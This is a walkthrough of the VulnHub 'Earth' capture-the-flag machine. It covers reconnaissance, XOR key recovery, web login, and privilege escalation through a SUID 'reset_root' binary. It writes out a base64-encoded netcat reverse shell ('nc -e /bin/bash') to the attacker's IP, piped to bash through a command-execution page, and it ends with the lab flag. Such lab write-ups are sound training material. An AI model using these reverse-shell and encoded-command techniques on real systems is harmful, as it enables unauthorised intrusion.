VULNHUB EARTH WALKTHROUGH
I RECONNAISSANCE
1. Network Discovery with ARP Scan: identify the target machine's IP address on your local network using arp-scan.
This command scans the local network and lists active devices along with their IP addresses. Look for the IP address associated with the target machine. The target's IP was found to be 192.168.1.19.
2. Port Scanning with Nmap: after identifying the target's IP, scan the machine for open ports and services using nmap.
The -sV option identifies service versions, and -A enables OS detection, version detection, and script scanning.
Based on the scan results, the following ports are open: 22 (ssh), 80 (http) and 443 (https).
3. Tried to browse to the IP directly, but the server answers with "Bad Request".
4. Handling the 400 Bad Request Error (DNS Configuration): since accessing the web server through http://192.168.1.19 gives a "400 Bad Request" error, the server expects to be addressed by hostname, so you need to map the IP to the names it serves.
Modify the /etc/hosts file: edit /etc/hosts so the target's DNS names resolve to its IP.
Add the following lines at the end of the file to map the IP to the DNS names.
5. Access the Web Server with DNS Names: now access the web server using the domain name: http://earth.local/
6. As you can see, the page now looks different.
II ENUMERATION
1. Web Enumeration: use dirb to enumerate directories: dirb http://earth.local
2. Clicked the admin link.
3. Need to find a username and password.
4. In my case, when I accessed http://terratest.earth.local, I received the same results as for earth.local, so I had to use https:// instead. Found robots.txt with: dirb https://terratest.earth.local
5. Found these entries by opening https://terratest.earth.local/robots.txt
6. The robots.txt file lists one interesting extra entry, testingnotes.txt, so we open it.
We learn that XOR encryption was used to encrypt the messages we saw on the Earth main page. Reading carefully, there is an entry saying that testdata.txt was used to test the encryption, so let's see if we can open testdata.txt.
So far, here’s what we’ve gathered:
· We have the username terra, found in testingnotes.txt.
· We have the encrypted message from the earth.local page.
· The encryption key is located in testdata.txt, which can be used to decrypt the message.
· We know there’s an admin page at earth.local/admin, so decrypting the message might help us figure out how to log in.
7. Tried to send a test message "hi this is a test message" with the key we got from http://terratest.earth.local/testdata.txt and got an encrypted message.
8. After trying all the encrypted messages, we found that the last string contains some human-readable text.
9. We get the string earthclimatechangebad4humans repeated over and over again.
XOR is its own inverse, so XORing a ciphertext with its plaintext hands back the keystream, and a short string repeating end to end (and cut off at the end) is the signature of a repeating key. That probably means earthclimatechangebad4humans is the key.
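The key recovery in steps 7 to 9 works because XOR with a repeating key is not a real cipher: any known plaintext gives back the keystream, and the key's period is visible in it. The following Python example is added here (it is not part of the original write-up); the key and message are constructed samples, not the VM's real values.

```python
# Added example: why repeating-key XOR leaks its key under known plaintext.
from itertools import cycle


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a key that repeats for the full length of data."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def recover_keystream(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """XOR is its own inverse: ciphertext XOR plaintext returns the keystream."""
    n = min(len(ciphertext), len(known_plaintext))
    return xor_bytes(ciphertext[:n], known_plaintext[:n])


def shortest_period(stream: bytes) -> bytes:
    """Return the shortest prefix that, repeated, reproduces the whole stream.

    For a keystream recovered from repeating-key XOR this is the key itself,
    provided the known plaintext is at least one key length long.
    """
    for p in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % p] for i in range(len(stream))):
            return stream[:p]
    return stream


# Constructed sample values (not the key or message from the Earth VM).
SAMPLE_KEY = b"notasecret"
SAMPLE_PLAINTEXT = b"this test file was used to check the xor routine before deployment"
# What an attacker would see published: the ciphertext, hex encoded.
SAMPLE_CIPHERTEXT_HEX = xor_bytes(SAMPLE_PLAINTEXT, SAMPLE_KEY).hex()


def demo() -> bytes:
    """Recover the key from the ciphertext and the known test plaintext."""
    ciphertext = bytes.fromhex(SAMPLE_CIPHERTEXT_HEX)
    keystream = recover_keystream(ciphertext, SAMPLE_PLAINTEXT)
    return shortest_period(keystream)


if __name__ == "__main__":
    print("recovered key:", demo())
```

The same logic explains the walkthrough's result: the "key" file was really the plaintext, so XORing it against the published message printed the actual key over and over.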
III GAINING INITIAL ACCESS
1. Found username and password.
Fortunately, terra:earthclimatechangebad4humans were the login credentials.
2. So we got a command execution page; tried ls and other commands.
After trying many commands and looking into many directories, we found that the user flag is located at /var/earth_web/user_flag.txt.
3. Ran the command cat /var/earth_web/user_flag.txt and got the user flag.
4. Now we want to establish remote access to our terminal using netcat. But we can't run this command directly, so we are going to encode the command "nc -e /bin/bash 192.168.1.9 7774" with base64.
5. On our terminal, start listening using netcat.
6. Now run this command on the web command execution page: echo "bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMS45IDc3NzQ=" | base64 -d | bash
7. The remote connection was established.
8. Tried ls to check that it is working.
9. To upgrade my limited shell I used the command:
python3 -c 'import pty; pty.spawn("/bin/bash")'
10. Got access.
IV ESCALATING PRIVILEGES
1. Now we want to figure out how to get root. The first thing I did was run 'sudo -l' to see what I can run with sudo, but it requires a password. So we run: find / -perm -u=s -type f 2>/dev/null, which searches for files that have the SUID permission set.
There is a binary called 'reset_root'.
2. When I tried running the binary, it failed with an error message stating that "all triggers not present."
I discovered that if the binary executes successfully, it changes root's password to 'Earth'. To determine the necessary triggers, I transferred the binary to my Kali Linux machine for further analysis.
3. To do that, I set up a ncat listener on my Kali machine that writes whatever it receives to a file, and then sent the binary over from the shell I had on the victim machine.
4. Got the file reset_root.
5. I changed the permissions on the reset_root binary so that it is executable.
6. Then I used ltrace on it. ltrace runs another binary and shows the library calls it makes, which is a great way to see what 'triggers' the binary checks for.
7. I saw which triggers are needed for the binary to run successfully. I switched back and created those files.
8. After running the reset_root binary, the root password was changed to Earth.
9. Got root access.
10. Went to the root directory, found root_flag.txt, and ran cat root_flag.txt.
11. Got the root flag.
[root_flag_b0da9554d29db2117b02aa8b66ec492e]
